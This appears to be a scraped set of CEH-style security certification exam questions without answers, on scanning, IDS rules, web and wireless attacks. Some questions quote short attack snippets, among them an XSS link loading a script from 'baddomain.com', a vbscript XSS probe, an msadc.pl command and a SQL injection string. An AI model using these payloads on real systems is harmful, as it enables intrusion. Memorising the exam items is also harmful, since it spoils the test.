Given the following extract from the snort log on a honeypot, what service is being exploited? :

Study the snort rule given below and interpret the rule.

alert tcp any any -- > 192.168.1.0/24 111 (content: " |00 01 86 a5| " ; msG. " mountd access " ;)

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn ' t work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed?

What is the correct order of steps in CEH System Hacking Cycle?

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website?

You are writing security policy that hardens and prevents Footprinting attempt by Hackers. Which of the following countermeasures will NOT be effective against this attack?

What type of port scan is represented here.

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker?

During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the following attacks should be used to obtain the key?

June, a security analyst, understands that a polymorphic virus has the ability to mutate and can change its known viral signature and hide from signature-based antivirus programs. Can June use an antivirus program in this case and would it be effective against a polymorphic virus?

What is the broadcast address for the subnet 190.86.168.0/22?

When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following?

Hayden is the network security administrator for her company, a large finance firm based in Miami. Hayden just returned from a security conference in Las Vegas where they talked about all kinds of old and new security threats; many of which she did not know of. Hayden is worried about the current security state of her company ' s network so she decides to start scanning the network from an external IP address. To see how some of the hosts on her network react, she sends out SYN packets to an IP range. A number of IPs responds with a SYN/ACK response. Before the connection is established she sends RST packets to those hosts to stop the session. She does this to see how her intrusion detection system will log the traffic. What type of scan is Hayden attempting here?

Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.

John Stevens is in charge of information security at Bank of Timbuktu. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank ' s customers had been changed! However, money hasn ' t been removed from the bank; instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application ' s logs and found the following entries:

What kind of attack did the Hacker attempt to carry out at the bank?

A security analyst in an insurance company is assigned to test a new web application that will be used by clients to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in ASP scripting language and it uses MSSQL as a database backend. The analyst locates the application ' s search form and introduces the following code in the search input fielD.

IMG SRC=vbscript:msgbox( " Vulnerable " ); > originalAttribute= " SRC " originalPath= " vbscript:msgbox( " Vulnerable " ); > "

When the analyst submits the form, the browser returns a pop-up window that says " Vulnerable " .

Which web applications vulnerability did the analyst discover?

After a client sends a connection request (SYN) packet to the server, the server will respond (SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by the client. This sequence number is predictable; the attack connects to a service first with its own IP address, records the sequence number chosen, and then opens a second connection from a forged IP address. The attack doesn ' t see the SYN-ACK (or any other packet) from the server, but can guess the correct responses. If the source IP address is used for authentication, then the attacker can use the one-sided communication to break into the server. What attacks can you successfully launch against a server using the above technique?

A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack the passwords for the AD users?

Which is the right sequence of packets sent during the initial TCP three way handshake?

On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless networks?

What are the differences between SSL and S-HTTP?

StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft ' s /GS option use _____ defense against buffer overflow attacks.

Virus Scrubbers and other malware detection program can only detect items that they are aware of. Which of the following tools would allow you to detect unauthorized changes or modifications of binary files on your system by unknown malware?

Which one of the following attacks will pass through a network layer intrusion detection system undetected?

Joe the Hacker breaks into XYZ’s Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan horse in one of the network utilities. Joe is worried that network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode.

What can Joe do to hide the wiretap program from being detected by ifconfig command?

You have just received an assignment for an assessment at a company site. Company ' s management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing ?

Say that " abigcompany.com " had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error?

Select the best answer.

Which is the Novell Netware Packet signature level used to sign all packets ?

Exhibit:

Given the following extract from the snort log on a honeypot, what do you infer from the attack?

An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS?

Select the best answer.

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions.

On further research, the tester come across a perl script that runs the following msadc functions:system( " perl msadc.pl -h $host -C \ " echo open $your > testfile\ " " );

Which exploit is indicated by this script?

Attackers target HINFO record types stored on a DNS server to enumerate information. These are information records and potential source for reconnaissance. A network administrator has the option of entering host information specifically the CPU type and operating system when creating a new DNS record. An attacker can extract this type of information easily from a DNS server.

Which of the following commands extracts the HINFO record?

Fake Anti-Virus, is one of the most frequently encountered and persistent threats on the web. This malware uses social engineering to lure users into infected websites with a technique called Search Engine Optimization.

Once the Fake AV is downloaded into the user ' s computer, the software will scare them into believing their system is infected with threats that do not really exist, and then push users to purchase services to clean up the non-existent threats.

The Fake AntiVirus will continue to send these annoying and intrusive alerts until a payment is made.

What is the risk of installing Fake AntiVirus?

A program that defends against a port scanner will attempt to:

A POP3 client contacts the POP3 server:

If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token performs off-line checking for the correct PIN, what type of attack is possible?

Which of the following are valid types of rootkits? (Choose three.)

Blake is in charge of securing all 20 of his company ' s servers. He has enabled hardware and software firewalls, hardened the operating systems, and disabled all unnecessary services on all the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake is especially concerned about this since telnet can be a very large security risk in an organization. Blake is concerned about how this particular server might look to an outside attacker so he decides to perform some footprinting, scanning, and penetration tests on the server. Blake telnets into the server using Port 80 and types in the following command:

HEAD / HTTP/1.0

After pressing enter twice, Blake gets the following results: What has Blake just accomplished?

A security engineer is attempting to map a company’s internal network. The engineer enters in the following NMAP commanD.

NMAP –n –sS –P0 –p 80 ***.***.**.**

What type of scan is this?

When utilizing technical assessment methods to assess the security posture of a network, which of the following techniques would be most effective in determining whether end-user security training would be beneficial?

Jeremy is web security consultant for Information Securitas. Jeremy has just been hired to perform contract work for a large state agency in Michigan. Jeremy ' s first task is to scan all the company ' s external websites. Jeremy comes upon a login page which appears to allow employees access to sensitive areas on the website. James types in the following statement in the username field:

SELECT * from Users where username= ' admin ' ?AND password= ' ' AND email like ' %@testers.com% '

What will the SQL statement accomplish?

The traditional traceroute sends out ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets take to reach the destination.

The problem is that with the widespread use of firewalls on the Internet today, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination.

How would you overcome the Firewall restriction on ICMP ECHO packets?

What is the main difference between a “Normal” SQL Injection and a “Blind” SQL Injection vulnerability?

To reduce the attack surface of a system, administrators should perform which of the following processes to remove unnecessary software, services, and insecure configuration settings?

A hacker was able to sniff packets on a company ' s wireless network. The following information was discovereD.

The Key 10110010 01001011

The Cyphertext 01100101 01011010

Using the Exlcusive OR, what was the original message?

A network security administrator is worried about potential man-in-the-middle attacks when users access a corporate web site from their workstations. Which of the following is the best remediation against this type of attack?

Data hiding analysis can be useful in

Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to a proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What proxy tool has Gerald ' s attacker used to cover their tracks?

File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers?

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers.

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company ' s systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company ' s computer systems until they have signed the policy in acceptance of its terms. What is this document called?

A simple compiler technique used by programmers is to add a terminator ' canary word ' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?

You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?

Take a look at the following attack on a Web Server using obstructed URL:

How would you protect from these attacks?

Steve scans the network for SNMP enabled devices. Which port number Steve should scan?

You are footprinting an organization and gathering competitive intelligence. You visit the company ' s website for contact information and telephone numbers but do not find them listed there. You know they had the entire staff directory listed on their website 12 months ago but now it is not there. Is there any way you can retrieve information from a website that is outdated?

Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment.

Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it.

What kind of Denial of Service attack was best illustrated in the scenario above?

Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company ' s strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph ' s supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph ' s company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication?

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the " TCP three-way handshake. " While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack?

Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility is to ensure that all physical and logical aspects of the city ' s computer network are secure from all angles. Bill is an IT technician that works with Hampton in the same IT department. Bill ' s primary responsibility is to keep PC ' s and servers up to date and to keep track of all the agency laptops that the company owns and lends out to its employees. After Bill setup a wireless network for the agency, Hampton made sure that everything was secure. He instituted encryption, rotating keys, turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only company laptops are allowed to use the wireless network, so Hampton entered all the MAC addresses for those laptops into the wireless security utility so that only those laptops should be able to access the wireless network.

Hampton does not keep track of all the laptops, but he is pretty certain that the agency only purchases Dell laptops. Hampton is curious about this because he notices Bill working on a Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions, Hampton decides to talk to Bill ' s boss and see if they had purchased a Toshiba laptop instead of the usual Dell. Bill ' s boss said no, so now Hampton is very curious to see how Bill is accessing the Internet. Hampton does site surveys every couple of days, and has yet to see any outside wireless network signals inside the company ' s building.

How was Bill able to get Internet access without using an agency laptop?

When writing shellcodes, you must avoid ____________ because these will end the string.

In which step Steganography fits in CEH System Hacking Cycle (SHC)

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

< ahref= " http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E " > See foobar < /a >

What is this attack?

Which of the following is NOT part of CEH Scanning Methodology?

What type of Virus is shown here?

The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources. However, host A can continue to receive data as long as the SYN sequence numbers of transmitted packets from host B are lower than the packet segment containing the set FIN flag.

" Testing the network using the same methodologies and tools employed by attackers " Identify the correct terminology that defines the above statement.

Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response?

Rebecca has noted multiple entries in her logs about users attempting to connect on ports that are either not opened or ports that are not for public usage. How can she restrict this type of abuse by limiting access to only specific IP addresses that are trusted by using one of the built-in Linux Operating System tools?

What type of cookies can be generated while visiting different web sites on the Internet?

John is discussing security with Jane. Jane had mentioned to John earlier that she suspects an LKM has been installed on her server. She believes this is the reason that the server has been acting erratically lately. LKM stands for Loadable Kernel Module.

What does this mean in the context of Linux Security?

Peter is a Linux network admin. As a knowledgeable security consultant, he turns to you to look for help on a firewall. He wants to use Linux as his firewall and use the latest freely available version that is offered. What do you recommend?

Select the best answer.

Sally is a network admin for a small company. She was asked to install wireless accesspoints in the building. In looking at the specifications for the access-points, she sees that all of them offer WEP. Which of these are true about WEP?

Select the best answer.

ETHER: Destination address : 0000BA5EBA11 ETHER: Source address :

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application?

Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.

Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;

After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;

What attack is being depicted here?